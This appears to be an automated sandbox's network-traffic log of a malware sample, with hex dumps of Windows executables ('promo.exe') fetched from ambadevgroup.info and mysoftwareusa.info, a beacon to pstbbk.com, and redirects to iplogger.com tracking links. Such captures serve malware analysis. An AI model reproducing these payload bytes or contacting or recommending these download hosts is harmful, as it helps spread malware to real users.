00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SSSARSAR+SARSRSRSRSARSARSARSSOSRS=SSUSSRSRichSPELGgb"!D!@/'H@$(xGx-[$p$!@!)`.text!! `.rdatadi!j!@@.data0j@.rsrc**@@.reloc[-\D-@B
Dec 6, 2023 14:33:21.681092024 CET	1340	IN	Data Raw: 00 00 00 00 00 00 00 55 8b ec 6a ff 68 14 10 5c 00 64 a1 00 00 00 00 50 81 ec b0 00 00 00 a1 24 30 6a 00 33 c5 89 45 f0 50 8d 45 f4 64 a3 00 00 00 00 6a 09 ba a0 73 62 00 8d 8d 48 ff ff ff e8 33 62 00 00 c7 45 fc 00 00 00 00 ba b4 73 62 00 6a 09 Data Ascii: Ujh\dP$0j3EPEdjsbH3bEsbj`bEsbjxbEsbjMaEsbjMaEtbjMaEtbjMaEEHPQjITEHh`y@jj
Dec 6, 2023 14:33:21.681145906 CET	1340	IN	Data Raw: fc 15 8b 8d 9c fe ff ff 85 c9 74 1d 8b 01 8b 50 10 8d 85 78 fe ff ff 3b c8 0f 95 c0 50 ff d2 c7 85 9c fe ff ff 00 00 00 00 c7 45 fc 1b 00 00 00 8d 8d a0 fe ff ff 51 8d 45 f0 50 51 e8 70 a1 03 00 c7 45 fc ff ff ff ff 8d 85 a0 fe ff ff 68 10 a3 43 Data Ascii: tPx;PEQEPQpEhCjj0PM~hpaMdYM3}]jhTb@j[haOYjhbAj[ha/Yjhb(Aj[haYj
Dec 6, 2023 14:33:21.681229115 CET	1340	IN	Data Raw: 6a 09 8d 4d 90 e8 61 58 00 00 c6 45 fc 03 ba f0 73 62 00 6a 09 8d 4d a8 e8 4e 58 00 00 c6 45 fc 04 ba 04 74 62 00 6a 05 8d 4d c0 e8 3b 58 00 00 c6 45 fc 05 ba 10 74 62 00 6a 04 8d 4d d8 e8 28 58 00 00 c7 45 fc 06 00 00 00 83 c4 18 8d 45 f0 8d 8d Data Ascii: jMaXEsbjMNXEtbjM;XEtbjM(XEEHPQ`jJEHh`y@jjP&yh@am\|MdYM3x]Ujh\dP$0j3EPEdjsbHWEsb
Dec 6, 2023 14:33:21.681303978 CET	1340	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 81 ec c8 00 00 00 a1 24 30 6a 00 33 c4 89 84 24 c4 00 00 00 8d 0c 24 c7 04 24 60 2e 63 00 51 8d 84 24 c4 00 00 00 c7 44 24 08 00 00 00 00 50 51 b9 9c b0 6a 00 c7 44 Data Ascii: U$0j3$$$`.cQ$D$PQjD$D$.cD$D$ D$$#cD$(D$,D$0.cD$4D$8D$</cD$@D$DD$HH/cD$LD$PD$T/cD$XD$\D$`/cD$
Dec 6, 2023 14:33:21.681348085 CET	1340	IN	Data Raw: dc 51 63 00 c7 45 a4 b4 b0 6a 00 c7 45 a8 03 00 00 00 c7 45 ac a4 51 63 00 c7 45 b0 b4 b0 6a 00 c7 45 b4 04 00 00 00 c7 45 b8 50 52 63 00 c7 45 bc c0 b0 6a 00 c7 45 c0 05 00 00 00 c7 45 c4 14 52 63 00 c7 45 c8 cc b0 6a 00 c7 45 cc 08 00 00 00 c7 Data Ascii: QcEjEEQcEjEEPRcEjEERcEjEERcEjEE\|RcEjE=UUU<@r)G#;PnA#HtWn3jjjEjE
Dec 6, 2023 14:33:21.681437969 CET	1340	IN	Data Raw: 02 33 c0 a3 e4 b1 6a 00 a3 e8 b1 6a 00 03 c6 a3 ec b1 6a 00 c7 45 d4 e4 b1 6a 00 c7 45 fc 00 00 00 00 8d 45 dc ff 75 d8 8b 35 e4 b1 6a 00 50 56 e8 c4 89 19 00 8d 04 be c7 45 d4 00 00 00 00 83 c4 0c a3 e8 b1 6a 00 c7 45 fc ff ff ff ff 68 b0 b5 61 Data Ascii: 3jjjEjEEu5jPVEjEhamMdY_^M3i].AMCUjh_dP$0j3PEdjhjdjjpau\a~yPjj$E
Dec 6, 2023 14:33:21.681509018 CET	1340	IN	Data Raw: 44 6a 00 c7 45 fc 01 00 00 00 c7 45 f0 98 44 6a 00 e8 ed 6f 00 00 85 c0 0f 84 a2 00 00 00 8b 10 8b c8 ff 52 0c 83 c0 10 a3 98 44 6a 00 c6 45 fc 03 c6 05 9c 44 6a 00 01 c7 45 f0 a0 44 6a 00 e8 bf 6f 00 00 85 c0 74 78 8b 10 8b c8 ff 52 0c 83 c0 10 Data Ascii: DjEEDjoRDjEDjEDjotxRDjEEDjotURDjEEDjyot2RDjEha/hMdY]h@khahYtjF5h a
Dec 6, 2023 14:33:21.681586981 CET	1340	IN	Data Raw: fc 09 33 c0 50 c7 05 b8 45 6a 00 00 00 00 00 b9 b8 45 6a 00 c7 05 c8 45 6a 00 00 00 00 00 c7 05 cc 45 6a 00 00 00 00 00 68 4c 74 62 00 c7 05 c8 45 6a 00 00 00 00 00 c7 05 cc 45 6a 00 07 00 00 00 66 a3 b8 45 6a 00 e8 f1 3d 00 00 c6 45 fc 0a 33 c0 Data Ascii: 3PEjEjEjEjhLtbEjEjfEj=E3PEjEjEjEjhLtbEjEjfEj=E3jEjEjEjEjEjfEjhldEjT=E3j
Dec 6, 2023 14:33:21.681660891 CET	1340	IN	Data Raw: 48 47 6a 00 00 00 00 00 b9 48 47 6a 00 c7 05 58 47 6a 00 00 00 00 00 c7 05 5c 47 6a 00 00 00 00 00 68 8c 5c 64 00 c7 05 58 47 6a 00 00 00 00 00 c7 05 5c 47 6a 00 07 00 00 00 66 a3 48 47 6a 00 e8 f2 38 00 00 c6 45 fc 1a 33 c0 50 0f 57 c0 c7 05 68 Data Ascii: HGjHGjXGj\Gjh\dXGj\GjfHGj8E3PWhGjxGjhGj\|GjhLtbf`GjxGj\|GjfhGj8E3PGjGjGjGjhLtbGjGjfGjK8E3P
Dec 6, 2023 14:33:21.864860058 CET	1340	IN	Data Raw: c7 05 e0 48 6a 00 00 00 00 00 b9 e0 48 6a 00 c7 05 f0 48 6a 00 00 00 00 00 c7 05 f4 48 6a 00 00 00 00 00 68 84 6e 64 00 c7 05 f0 48 6a 00 00 00 00 00 c7 05 f4 48 6a 00 07 00 00 00 66 a3 e0 48 6a 00 e8 ea 33 00 00 c6 45 fc 2a c7 05 f8 48 6a 00 00 Data Ascii: HjHjHjHjhndHjHjfHj3E*Hjj3IjIjHjhTudIjIjfHj3E+3jIjIj Ij$Ijhc Ij$IjfIjL3E,W30Ij

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:33:41.532380104 CET	230	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvancedInstaller Host: pstbbk.com Content-Length: 8 Cache-Control: no-cache
Dec 6, 2023 14:33:41.532458067 CET	62	OUT	Data Raw: 73 69 64 3d 32 35 39 38 Data Ascii: sid=2598
Dec 6, 2023 14:33:42.602147102 CET	238	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:33:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:33:44.784472942 CET	215	OUT	HEAD /load/1509/promo.exe HTTP/1.1 Accept: / User-Agent: InnoDownloadPlugin/1.5 Host: ambadevgroup.info Connection: Keep-Alive Cache-Control: no-cache
Dec 6, 2023 14:33:45.028826952 CET	349	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:33:44 GMT Content-Type: application/x-msdos-program Content-Length: 1247744 Connection: keep-alive Vary: User-Agent Last-Modified: Sat, 02 Dec 2023 03:41:44 GMT ETag: "130a00-60b7ea9eab3a0" Accept-Ranges: bytes
Dec 6, 2023 14:33:45.067270041 CET	214	OUT	GET /load/1509/promo.exe HTTP/1.1 Accept: / User-Agent: InnoDownloadPlugin/1.5 Host: ambadevgroup.info Connection: Keep-Alive Cache-Control: no-cache
Dec 6, 2023 14:33:45.318173885 CET	1340	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:33:45 GMT Content-Type: application/x-msdos-program Content-Length: 1247744 Connection: keep-alive Vary: User-Agent Last-Modified: Sat, 02 Dec 2023 03:41:44 GMT ETag: "130a00-60b7ea9eab3a0" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 44 a7 6a 65 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 5a 09 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 13 00 00 04 00 00 bb ab 13 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 24 9e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 12 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 24 9e 05 00 00 40 0d 00 00 a0 05 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 12 00 00 76 00 00 00 94 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELDje"Zw@`@@@d\|@$u4@.text `.rdata@@.datalpH@.rsrc$@@@.relocuv@B
Dec 6, 2023 14:33:45.318237066 CET	1340	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23 44 00 e8 72 f0 01 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYV
Dec 6, 2023 14:33:45.318276882 CET	1340	IN	Data Raw: 04 00 00 8b 03 8b 40 04 03 c7 83 b8 98 fb ff ff 00 75 ce ff 15 6c c8 49 00 8b 4f e0 85 c9 0f 85 6b 10 04 00 8b 4f d4 85 c9 0f 85 75 10 04 00 33 db 89 5f dc 8b 4f c4 85 c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a Data Ascii: @ulIOkOu3_OO_`d<IvY\|#l)\DItvL@IY9TPTX<@IY9D@
Dec 6, 2023 14:33:45.318320036 CET	296	IN	Data Raw: b5 00 00 8b ce e8 ab b5 00 00 6a 40 56 e8 d0 e3 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 53 8b d9 56 57 80 7b 0d 00 8b 7b 08 75 29 8b 45 08 8b cf 8b 30 e8 7e b5 00 00 89 37 c7 47 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 Data Ascii: j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_
Dec 6, 2023 14:33:45.318358898 CET	1340	IN	Data Raw: 5d c2 04 00 55 8b ec 56 8b 75 08 57 8b f9 56 83 67 08 00 e8 eb e5 00 00 8a 46 10 8d 4f 20 88 47 10 8b 46 14 89 47 14 8a 46 18 88 47 18 8d 46 20 83 61 08 00 50 e8 c9 e5 00 00 8a 46 30 88 47 30 8b c7 5f 5e 5d c2 04 00 33 d2 33 c0 89 11 40 89 41 0c Data Ascii: ]UVuWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q Q(Q0V&NW LjE$\|I IF^jAZ @uSV5I3W
Dec 6, 2023 14:33:45.318396091 CET	1340	IN	Data Raw: 85 97 07 04 00 8a 01 c3 83 39 00 0f 95 c0 c3 8b 41 08 83 78 04 00 eb f3 55 8b ec 53 56 8b 75 08 33 db 57 8a d3 8b 0e 8d 79 01 51 89 3e e8 9c 07 00 00 85 c0 74 1c 89 0d 28 15 4d 00 8b 40 04 8b 00 66 39 58 08 75 05 83 38 21 74 0f 8b cf 84 d2 74 d5 Data Ascii: 9AxUSVu3WyQ>t(M@f9Xu8!tt_^3[]U3BSVWPPUUJ(MO1f~u6 t+u+3+fy4AEAEARUE{lM
Dec 6, 2023 14:33:45.318434000 CET	1340	IN	Data Raw: 00 83 6d b4 01 0f 85 4d 05 04 00 eb 10 8b 45 b4 40 89 45 b4 83 f8 01 0f 8f 30 05 04 00 ff 75 e8 8b 5d fc ff 75 f4 8b 45 f8 ff 75 e4 ff 75 e0 53 50 ff 75 f0 57 e8 0f 04 00 00 85 c0 0f 89 08 ff ff ff e9 82 00 00 00 8b 41 04 6a 7f 59 66 39 48 08 0f Data Ascii: mME@E0u]uEuuSPuWAjYf9HEHOTE]ETpXEE;1uuuuSRu3SxMxl`
Dec 6, 2023 14:33:45.318474054 CET	1340	IN	Data Raw: 0c b8 8b d1 8b 44 b8 04 89 4d f4 8b c8 89 45 f8 e8 dc a9 01 00 84 c0 75 13 8b 4e 0c 47 8d 41 ff 3b f8 7c d8 84 db 75 c9 5b 5f eb 8c 8b 46 08 b3 01 8b 4d f8 89 0c b8 8b 46 08 8b 4d f4 89 4c b8 04 eb d6 55 8b ec 83 e4 f8 b8 2c 00 02 00 e8 0e f5 03 Data Ascii: DMEuNGA;\|u[_FMFMLU,SVWL$(D$83Ph\$\$(ID$PuIM3#MG;D$PQhMhM,#MM#MD$D$P$<Ph
Dec 6, 2023 14:33:45.318510056 CET	1340	IN	Data Raw: 15 02 00 59 8b 4e 0c 33 db 8b f8 43 8b 01 3b c3 0f 8f 0c fd 03 00 8b 46 04 8b ce 03 c7 50 e8 69 71 00 00 8b 1e 8d 04 3f 50 8b 46 04 ff 75 08 8d 04 43 50 e8 ed d9 01 00 01 7e 04 83 c4 0c 8b 06 33 d2 8b 4e 04 5f 66 89 14 48 8b c6 5e 5b 5d c2 08 00 Data Ascii: YN3C;FPiq?PFuCP~3N_fH^[]U<EL$S3#MV4If#MW#M#M#M#M#M#M#M#M#M#MDI#M#M#M#M#M#M#M#M#M
Dec 6, 2023 14:33:45.499962091 CET	1340	IN	Data Raw: 84 80 fa 03 00 6a 00 ff 15 d0 c4 49 00 c6 05 68 13 4d 00 01 8b ce e8 07 00 00 00 5f 5e 5b 8b e5 5d c3 55 8b ec 83 e4 f8 81 ec cc 04 00 00 80 3d 68 13 4d 00 00 56 8b f1 0f 84 d4 00 00 00 68 04 01 00 00 8d 4c 24 0c e8 23 29 00 00 80 3d 67 13 4d 00 Data Ascii: jIhM_^[]U=hMVhL$#)=gM93fD$D$PL$1=eMM~`'hML$)$(VjPML$$T$$3F$$ h$(2YD$P$4P
Dec 6, 2023 14:33:45.499991894 CET	1340	IN	Data Raw: 20 1a 4d 00 85 c0 0f 85 b6 f6 03 00 b9 0c 1a 4d 00 e8 72 5a 00 00 b9 fc 19 4d 00 e8 68 5a 00 00 b9 ec 19 4d 00 e8 5e 5a 00 00 b9 dc 19 4d 00 e8 54 5a 00 00 b9 cc 19 4d 00 e8 4a 5a 00 00 b9 bc 19 4d 00 e8 40 5a 00 00 5f b9 ac 19 4d 00 5e e9 34 5a Data Ascii: MMrZMhZM^ZMTZMJZM@Z_M^4ZSQQUkl$0=#MVWE#M<5#M3jZQb=#MY3E#MM~B=#Mv;}=#M3M@MEwEM3j

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:34:50.620887041 CET	147	OUT	GET /stats/3/0/0 HTTP/1.1 User-Agent: InnoDownloadPlugin/1.4.3 Host: mysoftwareusa.info
Dec 6, 2023 14:34:50.985933065 CET	269	IN	HTTP/1.1 302 Found Server: nginx/1.14.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:34:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 3 Connection: keep-alive location: https://iplogger.com/1gWvm4 Data Raw: ef bb bf Data Ascii:
Dec 6, 2023 14:34:52.376455069 CET	147	OUT	GET /stats/3/1/0 HTTP/1.1 User-Agent: InnoDownloadPlugin/1.4.3 Host: mysoftwareusa.info
Dec 6, 2023 14:34:52.770020008 CET	269	IN	HTTP/1.1 302 Found Server: nginx/1.14.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:34:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 3 Connection: keep-alive location: https://iplogger.com/1gYvm4 Data Raw: ef bb bf Data Ascii:
Dec 6, 2023 14:34:53.636115074 CET	146	OUT	GET /archives/5 HTTP/1.1 User-Agent: InnoDownloadPlugin/1.4.3 Host: mysoftwareusa.info
Dec 6, 2023 14:34:53.926584005 CET	1340	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:34:53 GMT Content-Type: application/octet-stream Content-Length: 2713088 Connection: keep-alive Content-Disposition: attachment; filename=promo.exe Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 da fa 65 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 94 06 00 00 8c 03 00 00 00 00 00 00 50 6a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 6a 00 00 04 00 00 f0 74 29 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6d 60 0a 00 95 00 00 00 00 30 08 00 6a 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 0a 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 08 00 00 10 00 00 00 6e 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 6a 24 02 00 00 30 08 00 00 10 01 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 0a 00 00 02 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 3b 00 00 70 0a 00 00 02 00 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 65 62 65 79 74 7a 6b 00 e0 24 00 00 70 45 00 00 d2 24 00 00 92 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6b 7a 6e 70 66 74 62 00 10 00 00 00 50 6a 00 00 02 00 00 00 64 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELeePj@`jt)@m`0j$a n@.rsrcj$0~@.idata `@ ;p@jebeytzk$pE$@ukznpftbPjd)@
Dec 6, 2023 14:34:53.926654100 CET	1340	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 6, 2023 14:34:53.926750898 CET	1340	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 6, 2023 14:34:53.926791906 CET	1340	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 6, 2023 14:34:53.926841021 CET	1340	IN	Data Raw: e8 84 b7 5c f9 08 99 12 e7 8f e5 7b 3a a9 6b 01 db 05 fb 14 a8 46 b4 f1 1f 63 08 e8 cf 8e 38 d1 1b ad ef cb fb 9f f7 cc 10 40 3b ab b3 e7 f6 35 fe 16 03 ad f8 d6 e3 27 13 92 d4 e2 08 0b c4 e1 d9 89 1d 83 c5 e9 7c 3e 62 dd e6 f2 ba 1a 17 4b ed 64 Data Ascii: \{:kFc8@;5'\|>bKd9~"a0$(v+&C9Bn3`!z\n 08H _X[kZW$awcQzm4D-i5dEbm$K:V43q
Dec 6, 2023 14:34:53.926879883 CET	1340	IN	Data Raw: af ab 1d 5b d8 a6 a7 70 e2 b4 f6 3f e7 cf 66 1b ac 21 9c a8 22 6c fc 9e 03 28 3c 22 a9 b4 fd 97 8f 60 4e 5e 80 9c 81 91 7d e3 47 aa 82 65 83 e9 a8 9c 81 7d bc df dd 4d 4c a0 96 19 92 df 08 97 1f 32 ab 4e df e5 46 6f 68 ed b0 6f e7 91 07 70 24 59 Data Ascii: [p?f!"l(<"`N^}Ge}ML2NFohop$Ykf:qa}LZprf$8{6w7A'(--zngCchJ@I`3u'#@c$YqBG@&/mk+0J'wR}A
Dec 6, 2023 14:34:53.926928997 CET	534	IN	Data Raw: 4e 96 be 9e 2d 0f 7e 1d fe bf c1 35 c3 a9 61 d8 fe 17 e0 bf 35 08 4f e9 cd fd 5f 17 ce 78 2d f1 83 12 5f c0 ce f8 cc c1 4a 2b 07 cb f9 12 e4 fe 21 40 32 54 d1 37 ca ab 17 32 1b 94 40 07 f8 dd 5a 92 5e 73 06 86 63 7d ef 7e e1 16 6e f5 9a a4 19 78 Data Ascii: N-~5a5O_x-_J+!@2T72@Z^sc}~nx=5)Yg'5\| ]6{D{~6MP1U&q?w>$4WvGqdRwW/KNC@rCgKXM>:"D
